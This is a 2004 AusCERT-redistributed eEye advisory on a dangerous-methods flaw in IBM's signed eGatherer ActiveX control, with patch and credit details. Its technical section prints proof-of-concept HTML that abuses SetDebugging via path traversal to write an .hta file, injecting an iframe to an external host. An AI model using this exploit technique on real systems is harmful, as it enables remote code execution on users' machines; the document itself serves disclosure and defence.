Published:
17 June 2004
Protect yourself against future threats.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2004.0417 -- eEye Security Bulletin
"IBM Access Support" (eGatherer) Activex Dangerous Methods Vulnerability
17 June 2004
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: IBM Access Support (eGatherer) Activex Version
2.0.0.16
Publisher: eEye Digital Security
Platform: various IBM PC models
Impact: Execute Arbitrary Code/Commands
Access Required: Remote
Comment:
As stated below - IBM have released a patch for this vulnerability:
http://www-306.ibm.com/pc/support/site.wss/document.do?lndocid=MIGR-51860
- --------------------------BEGIN INCLUDED TEXT--------------------
"IBM Access Support" (eGatherer) Activex Dangerous Methods Vulnerability
Release Date:
June 15, 2004
Date Reported:
February 20, 2004
Patch Development Time (In Days):
116
Severity:
High (Remote Code Execution)
Vendor:
IBM
Systems Affected:
IBM Access Support (eGatherer) Activex Version 2.0.0.16
Overview:
eEye Digital Security has discovered a security vulnerability in IBM's
signed "eGatherer" activex. Because this application is signed, it might
be presented to users on the web for execution in the name of IBM. If
users trust IBM, they will run this, and their systems will be
compromised. This activex was designed by IBM to be used for an
automated support solution for their PC's. This is installed by default
on many popular IBM PC models.
The issue is quite simple. Activex is a very profound web technology. As
a profound web technology it may be abused. Designers might create an
activex which could perform any function on an user's computer.
Microsoft relies on trust for the security model and warns against
making activex with dangerous capabilities. The responsibility, however,
rests with the creator of the activex, as in any trust model.
In this case, IBM made available methods named such as "GetMake",
"GetModel", "GetOSName", "SetDebugging" (accepting variable called
"filename") and "RunEgatherer" (also accepting suspicious parameter).
These dangerous methods were found to be able to write a trojan file to
the user's startup folder through a difficult trick.
It should be further noted that both "SetDebugging" and "RunEgether"
methods allow a web page author to write files of their choice (though
the content is limited) to the victim's hard drive -- anywhere to their
hard drive. These are the default and clearly stated usage of these
methods.
Technical Details:
For clarification purposes this will be presented as a two page attack,
though it may easily be a single HTML page attack.
- -----------EXAMPLE HTML 1 ---------
//first this page would be viewed, then through refreshing or whatever
one goes to the second page (or just timing the two calls with
SetTimeOUt and putting them on the same page...)
|object classid="clsid:74FFE28D-2378-11D5-990C-006094235084" id="X"|
|object|
|script|
X.SetDebugging("/../xx.hta",-1);
|script|
- ---------------------------------
- -----------EXAMPLE HTML 2 ---------
|object classid="clsid:74FFE28D-2378-11D5-990C-006094235084" id="X"|
|object|
|script|
X.SetDebugging("/../x<iframe src=http://www.malware.com>x.hta",-1);
|script|
- ---------------------------------
In the above example, we see the object called utilizing the "object"
tag. The codebase tag [not shown here] is used by the browser to
initiate the install of the activex if it is not already existing on the
system. This would bring up the activex prompt which essentially asks
the user if they trust IBM. Finally, the object is named "X", so we
might reference it later in script and use its' dangerous methods.
In the first page we call the "SetDebugging" method. "SetDebugging"
writes a file called "xx.hta" to the C:\ drive. (An attacker would
probably write the file to the StartUP folder in real life.) This file
will have "xx.hta" written inside of it, along with some other stuff.
We need to control what is written inside the file so we can write
dangerous scripting. But, all we can write is what can be in a filename.
Now, the second HTML page is called. What happens? The application
throws an error, but before it crashes, it writes our exploit code to
the file "xx.hta". (It crashes because "<>" are not valid characters for
a filename).
So, now we have the exploit file in the exploit location with the
exploit location within it... and the target system is taken down.
Protection:
Retina Network Security Scanner has been updated to identify this
vulnerability.
Vendor Status:
IBM has released a patch for this vulnerability. The patch is available
at the following location:
http://www-306.ibm.com/pc/support/site.wss/document.do?lndocid=MIGR-5186
0
Credit:
Discovery: Drew Copley
Additional Research: http-equiv@malware.com
Related Links:
Retina Network Security Scanner - Free 15 Day Trial
http://www.eeye.com/html/products/retina/download/index.html
Another Quote of the Day:
"A man's greatest work is to break his enemies, to drive them before
him, to take from them all the things that have been theirs, to hear the
weeping of those who cherished them." - Genghis Khan
Copyright (c) 1998-2004 eEye Digital Security
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express
consent of eEye. If you wish to reprint the whole or any part of this
alert in any other medium excluding electronic medium, please email
alert@eEye.com for permission.
Disclaimer
The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are no warranties, implied or express, with regard to this information.
In no event shall the author be liable for any direct or indirect
damages whatsoever arising out of or in connection with the use or
spread of this information. Any use of this information is at the user's
own risk.
- --------------------------END INCLUDED TEXT--------------------
You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.
NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.
NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.
Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.
Previous advisories and external security bulletins can be retrieved from:
http://www.auscert.org.au/render.html?cid=1980
If you believe that your computer system has been compromised or attacked in
any way, we encourage you to let us know by completing the secure National IT
Incident Reporting Form at:
http://www.auscert.org.au/render.html?it=3192
Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business
hours which are GMT+10:00 (AEST). On call after hours
for member emergencies only.
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967
iQCUAwUBQNEzlSh9+71yA2DNAQK4dQP1Hhec6oQjCqBHN0eFJ0kDakya1r/sQSrB
ryOpoPx8ufViGLeTUvhQAEy0D8bPGdLggEBIee/hD8ThW3pddSa2kCRDkV9D1680
q4dKNqcaIxOYPth8tKkxCXiL4IOB/xnjtCITObTpMd8PwQmEC+hIMrkmp4fwlF+Z
YkMUNbhvGA==
=7tlx
-----END PGP SIGNATURE-----